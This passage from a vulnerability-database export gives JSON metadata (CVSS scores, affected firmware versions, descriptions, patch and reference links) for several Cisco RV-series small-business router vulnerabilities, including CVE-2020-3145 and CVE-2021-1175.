"https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2020-3145", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-008401", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2020-3145", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ykramarz@cisco.com", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2020-3145", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-008401", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-3145", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2020-3145", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-008401", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-202007-1083", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2020-3145", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2020-3145" }, { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "CNNVD", "id": "CNNVD-202007-1083" }, { "db": "NVD", "id": "CVE-2020-3145" }, { "db": "NVD", "id": "CVE-2020-3145" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit these vulnerabilities by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state", "sources": [ { "db": "NVD", "id": "CVE-2020-3145" }, { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "VULMON", "id": "CVE-2020-3145" } ], "trust": 1.71 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-3145", "trust": 2.5 }, { "db": "JVNDB", "id": "JVNDB-2020-008401", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2020.2417", "trust": 0.6 }, { "db": "NSFOCUS", "id": "48354", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202007-1083", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2020-3145", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2020-3145" }, { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "CNNVD", "id": "CNNVD-202007-1083" }, { "db": "NVD", "id": "CVE-2020-3145" } ] }, "id": "VAR-202007-1014", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.611919898 }, "last_update_date": "2024-11-23T21:59:08.857000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-rce-m4FEEGWX", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-m4FEEGWX" }, { "title": "Multiple Cisco Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124565" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2020/07/16/cisco_patches_july/" }, { "title": "Cisco: Cisco RV110W, RV130, RV130W, and RV215W Routers Management Interface Remote Command Execution Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-rce-m4FEEGWX" } ], "sources": [ { "db": "VULMON", "id": "CVE-2020-3145" }, { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "CNNVD", "id": "CNNVD-202007-1083" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "NVD", "id": "CVE-2020-3145" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-rce-m4feegwx" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3145" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3145" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2417/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/48354" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "VULMON", "id": "CVE-2020-3145" }, { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "CNNVD", "id": "CNNVD-202007-1083" }, { "db": "NVD", "id": "CVE-2020-3145" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2020-3145" }, { "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "db": "CNNVD", "id": "CNNVD-202007-1083" }, { "db": "NVD", "id": "CVE-2020-3145" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-07-16T00:00:00", "db": "VULMON", "id": "CVE-2020-3145" }, { "date": "2020-09-11T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "date": "2020-07-15T00:00:00", "db": "CNNVD", "id": "CNNVD-202007-1083" }, { "date": "2020-07-16T18:15:16.580000", "db": "NVD", "id": "CVE-2020-3145" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-07-23T00:00:00", "db": "VULMON", "id": "CVE-2020-3145" }, { "date": "2020-09-11T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-008401" }, { "date": "2020-09-03T00:00:00", "db": "CNNVD", "id": "CNNVD-202007-1083" }, { "date": "2024-11-21T05:30:25.127000", "db": "NVD", "id": "CVE-2020-3145" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202007-1083" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Cisco RV Buffer error vulnerability in series routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-008401" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202007-1083" } ], "trust": 0.6 } }
var-202101-0855
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The vulnerability exists in the following devices or models: Cisco Small Business RV110W, Cisco Small Business RV130, Cisco Small Business RV130W, Cisco Small Business RV215W
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0855", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "NVD", "id": "CVE-2021-1175" } ] }, "cve": "CVE-2021-1175", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1175", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41212", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374229", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1175", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1175", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1175", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1175", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1175", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41212", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-1109", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374229", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "VULHUB", "id": "VHN-374229" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "CNNVD", "id": "CNNVD-202101-1109" }, { "db": "NVD", "id": "CVE-2021-1175" }, { "db": "NVD", "id": "CVE-2021-1175" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The vulnerability exists in the following devices or models: Cisco Small Business RV110W, Cisco Small Business RV130, Cisco Small Business RV130W, Cisco Small Business RV215W", "sources": [ { "db": "NVD", "id": "CVE-2021-1175" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "VULHUB", "id": "VHN-374229" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1175", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2021-002579", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-202101-1109", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2021-41212", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374229", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "VULHUB", "id": "VHN-374229" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "CNNVD", "id": "CNNVD-202101-1109" }, { "db": "NVD", "id": "CVE-2021-1175" } ] }, "id": "VAR-202101-0855", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "VULHUB", "id": "VHN-374229" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" } ] }, "last_update_date": "2024-11-23T21:34:54.793000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41212)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272501" }, { "title": "Multiple Cisco Repair measures for router access control errors", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139209" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "CNNVD", "id": "CNNVD-202101-1109" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374229" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "NVD", "id": "CVE-2021-1175" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1175" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "VULHUB", "id": "VHN-374229" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "CNNVD", "id": "CNNVD-202101-1109" }, { "db": "NVD", "id": "CVE-2021-1175" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41212" }, { "db": "VULHUB", "id": "VHN-374229" }, { "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "db": "CNNVD", "id": "CNNVD-202101-1109" }, { "db": "NVD", "id": "CVE-2021-1175" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41212" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374229" }, { "date": "2021-09-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1109" }, { "date": "2021-01-13T22:15:17.130000", "db": "NVD", "id": "CVE-2021-1175" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41212" }, { "date": "2021-01-19T00:00:00", "db": "VULHUB", "id": "VHN-374229" }, { "date": "2021-09-27T06:17:00", "db": "JVNDB", "id": "JVNDB-2021-002579" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1109" }, { "date": "2024-11-21T05:43:45.460000", "db": "NVD", "id": "CVE-2021-1175" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1109" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002579" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1109" } ], "trust": 0.6 } }
var-202006-1114
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W is a VPN firewall router from Cisco in the United States.
There are buffer overflow vulnerabilities in the web management interface of many Cisco products. The vulnerability stems from the program's failure to properly limit user input boundaries
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202006-1114", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": 